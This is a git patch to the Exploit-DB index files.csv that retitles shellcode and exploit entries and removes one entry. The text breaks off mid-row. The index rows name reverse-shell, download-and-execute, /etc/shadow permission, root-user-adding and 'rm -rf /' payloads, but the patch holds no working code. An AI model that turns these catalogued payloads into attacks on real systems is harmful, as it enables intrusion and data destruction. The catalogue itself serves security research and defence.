From d4775ec75b1d069c2c67b5e7b986179c8c5d9bb0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 25 Aug 2017 05:01:28 +0000 Subject: [PATCH] DB: 2017-08-25 --- files.csv | 205 +++++++++++------------ platforms/lin_x86-64/shellcode/37427.txt | 38 ----- platforms/lin_x86-64/shellcode/39151.c | 163 ------------------ platforms/lin_x86-64/shellcode/39844.c | 83 --------- platforms/php/webapps/40168.txt | 65 ------- platforms/windows/local/41971.py | 32 ++-- platforms/windows/local/42384.py | 54 ------ 7 files changed, 120 insertions(+), 520 deletions(-) delete mode 100755 platforms/lin_x86-64/shellcode/37427.txt delete mode 100755 platforms/lin_x86-64/shellcode/39151.c delete mode 100755 platforms/lin_x86-64/shellcode/39844.c delete mode 100755 platforms/php/webapps/40168.txt delete mode 100755 platforms/windows/local/42384.py diff --git a/files.csv b/files.csv index 1a9532882..136884fc7 100644 --- a/files.csv +++ b/files.csv @@ -5662,7 +5662,7 @@ id,file,description,date,author,platform,type,port 42483,platforms/windows/dos/42483.py,"MyDoomScanner 1.00 - Local Buffer Overflow (PoC)",2017-08-17,"Anurag Srivastava",windows,dos,0 42486,platforms/windows/dos/42486.py,"DSScan 1.0 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0 42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0 -42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 - LinuxSampler Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0 +42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0 42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 @@ -7865,7 +7865,7 @@ id,file,description,date,author,platform,type,port 21318,platforms/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21320,platforms/windows/local/21320.pl,"Internet Download Manager - Buffer Overflow (SEH)",2012-09-14,Dark-Puzzle,windows,local,0 21323,platforms/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 -21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0 +21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - 'MRUList201202.dat' File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Escalation",2002-03-13,EliCZ,windows,local,0 @@ -9195,7 +9195,6 @@ id,file,description,date,author,platform,type,port 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0 42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0 -42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0 42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0 42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0 42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0 @@ -15795,19 +15794,19 @@ id,file,description,date,author,platform,type,port 13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0 13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0 -13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 +13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0 13271,platforms/freebsd_x86/shellcode/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0 -13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0 -13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0 +13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,freebsd_x86,shellcode,0 +13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,freebsd_x86,shellcode,0 13274,platforms/freebsd_x86/shellcode/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,freebsd_x86,shellcode,0 13275,platforms/freebsd_x86/shellcode/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode,0 13276,platforms/freebsd_x86/shellcode/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 13277,platforms/freebsd_x86/shellcode/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0 -13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 +13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0 13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0 13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 @@ -15876,27 +15875,27 @@ id,file,description,date,author,platform,type,port 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13353,platforms/lin_x86/shellcode/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 -13354,platforms/lin_x86/shellcode/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 +13353,platforms/lin_x86/shellcode/13353.c,"Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 +13354,platforms/lin_x86/shellcode/13354.c,"Linux/x86 - execve /bin/sh Shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0 -13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - setreuid + executes command (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0 +13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0 13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 -13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0 +13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0 13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 -13364,platforms/generator/shellcode/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",generator,shellcode,0 -13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0 +13364,platforms/generator/shellcode/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",generator,shellcode,0 +13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,lin_x86,shellcode,0 13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 -13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 -13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0 -13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 -13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 @@ -15907,7 +15906,7 @@ id,file,description,date,author,platform,type,port 13378,platforms/lin_x86/shellcode/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0 -13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 +13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 @@ -15924,8 +15923,8 @@ id,file,description,date,author,platform,type,port 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13397,platforms/lin_x86/shellcode/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13401,platforms/generator/shellcode/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,generator,shellcode,0 13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0 @@ -15936,8 +15935,8 @@ id,file,description,date,author,platform,type,port 13407,platforms/lin_x86/shellcode/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0 13409,platforms/lin_x86/shellcode/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode,0 -13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes)",2005-09-09,xort,lin_x86,shellcode,0 -13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes)",2005-09-08,xort,lin_x86,shellcode,0 +13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,lin_x86,shellcode,0 +13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,lin_x86,shellcode,0 13412,platforms/lin_x86/shellcode/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0 13413,platforms/lin_x86/shellcode/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode,0 13414,platforms/lin_x86/shellcode/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode,0 @@ -15947,7 +15946,7 @@ id,file,description,date,author,platform,type,port 13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0 13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 @@ -15958,7 +15957,7 @@ id,file,description,date,author,platform,type,port 13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 -13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 +13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0 13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0 @@ -15970,7 +15969,7 @@ id,file,description,date,author,platform,type,port 13441,platforms/lin_x86/shellcode/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0 13442,platforms/lin_x86/shellcode/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13443,platforms/lin_x86/shellcode/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13444,platforms/lin_x86/shellcode/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13444,platforms/lin_x86/shellcode/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13445,platforms/lin_x86/shellcode/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13446,platforms/lin_x86/shellcode/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 @@ -15989,7 +15988,7 @@ id,file,description,date,author,platform,type,port 13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 -13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 +13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 13465,platforms/multiple/shellcode/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 13466,platforms/multiple/shellcode/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 13467,platforms/multiple/shellcode/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0 @@ -16000,7 +15999,7 @@ id,file,description,date,author,platform,type,port 13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0 -13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 Bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0 +13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0 13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0 13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0 13478,platforms/osx_ppc/shellcode/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 @@ -16015,7 +16014,7 @@ id,file,description,date,author,platform,type,port 13487,platforms/osx_ppc/shellcode/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0 -13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - setreuid + executes command Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 +13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ 